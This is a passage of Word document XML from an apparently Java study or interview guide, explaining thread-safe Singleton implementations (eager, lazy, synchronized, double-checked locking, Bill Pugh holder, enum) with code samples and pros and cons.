    <w:p w14:paraId="77798468" w14:textId="77777777" w:rsidR="00690065" w:rsidRPr="00CE4B95" w:rsidRDefault="00690065">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc196307770"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Thread safety with Singleton class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
    </w:p>
    <w:p w14:paraId="4C4FA19A" w14:textId="3E8E5480" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a critical aspect of concurrent programming, especially when multiple threads access the Singleton instance concurrently. A Singleton class ensures that only one instance of the class exists throughout the application. However, if multiple threads try to create an instance of the Singleton class simultaneously, it may result in multiple instances being created, violating the Singleton pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F761DF" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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Thread Safety in Singleton Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E726215"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o make a Singleton class thread-safe, we need to ensure that only one thread can create the instance of the Singleton class, while other threads should simply use the already created instance. Below are the different methods to achieve thread safety in a Singleton class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252990B4" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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1. Eager Initialization (Thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A11166"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In eager initialization, the Singleton instance is created at the time of class loading, ensuring that the instance is created even before any thread accesses it. This method is inherently thread-safe because the instance is created before any threads start execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C253EE3"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public class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA5339"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Eager initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787737E"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rivate static final Singleton instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266950D" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3470B2E5"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Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BC43F"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4998D" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B388F2"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Public method to get the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529973C5"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB2DD2"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619C8A7"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16336FB5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E513FB4" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>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lastRenderedPageBreak/>
        <w:t>Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Simple, no need for synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05CB23" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The instance is created even if it is never used, which could be inefficient if the object is heavy to create and is not always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4EC306" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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2. Lazy Initialization (Not Thread-Safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C97B1"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In lazy initialization, the Singleton instance is created only when it is needed (i.e., when getInstance() is called). However, this method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a multithreaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71744B52"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public class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A89E5"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rivate static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908C879" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FF78DE"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Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC84E2"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3812C0B3" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427755DD"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Not thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7725DA05"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0229F0C0"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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E059DD7"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instance = new Singleton(); // Potential thread safety issue here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884FB67"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00AD750A"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FB336"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6D3AE965"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818B7AD" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If multiple threads call getInstance() at the same time, it may lead to multiple instances being created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B19FA" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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3. Thread-Safe Singleton using Synchronized Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57305327"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o make the Singleton thread-safe with lazy initialization, you can synchronize the getInstance() method. However, this may introduce performance overhead due to synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2D602"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public class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608F892"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rivate static Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134DDF7" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44344045"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Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392745B"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44868001" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E981FF"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Thread-safe but inefficient due to synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D1975"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ublic static synchronized Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836873B"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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEEA14B"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instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AEC9A9"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037B255A"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26548FB7"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151A24CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270233E6" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8DC238" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1247"/>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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Synchronizing the method may lead to performance bottlenecks because every time getInstance() is called, the synchronization mechanism will be invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6092A5" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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4. Double-Checked Locking (Thread-Safe and Efficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6958A"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Double-checked locking improves the performance of synchronized methods by only locking the instance creation process and not every method call. This is achieved by first checking if the instance is null without synchronization, and then locking only if the instance is null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303A18D"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public class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5996EE"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rivate static volatile Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21001A47" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFCEC56"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Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51037137"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B19E2" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BCB0D9"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Double-checked locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD91BB9"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709461A"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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D30845"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synchronized (Singleton.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF11B15"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA8AA34"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instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749661DB"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48350E03"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366761E1"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3722D7F2"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return instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC32545"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2F79B769"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E0DD6" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5AAA6" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1248"/>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read-safe with better performance compared to synchronized methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED08F53" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1248"/>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Ensures the instance is created only when needed, avoiding the overhead of synchronization after the instance is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32174802" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42323AEF" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1248"/>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e use of volatile is required to ensure that the instance is visible to all threads, and this pattern can be slightly more complex to implement correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BC43C" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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5. Bill Pugh Singleton Design (Thread-Safe and Efficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A73EA5F"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This method leverages the </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java class loading mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure thread safety in a very efficient manner. The SingletonHelper class is not loaded until it is referenced, and the instance is created when the class is loaded, making this method both thread-safe and efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2F74F"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public class Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53065F66"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Private constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686B3C2"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rivate Singleton() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AADBF0" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC46472"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Inner static helper class that contains the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E5695"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rivate static class SingletonHelper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C84FF"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The Singleton instance is created when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7266EFA5"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rivate static final Singleton instance = new Singleton();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720471F1"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2F94250F" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615E89B0"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Public method to access the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D50B98"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ublic static Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A73DA"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return SingletonHelper.instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB3D6C"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5160572A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FCB4B4" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD646A" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1249"/>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read-safe without synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1F645" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1249"/>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Simple and elegant, with no performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81A503" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1249"/>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e instance is created when the SingletonHelper class is loaded, not before, making it lazy-loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA425F4" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: None, this is considered the most efficient and recommended way to implement the Singleton pattern in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350CE85" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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6. Enum-based Singleton (Thread-Safe and Robust)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F85BA"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Java's </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enum type</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a simple and thread-safe way to implement a Singleton. It handles all synchronization internally and ensures that only one instance of the enum exists, making it the safest and most robust way to create a Singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A205E"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public enum Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020880EE"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INSTANCE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46E894" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A553F80"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Any methods or variables can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371D1CB"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ublic void doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A0661"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System.out.println("Singleton instance method called");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A238278"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0F50F729"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302690E6" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52919973" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1250"/>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read-safe, and you do not need to worry about synchronization or locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8BF13" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1250"/>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e Java Enum guarantees that only one instance is created, and it's handled by the Java Virtual Machine (JVM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886FDC3" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
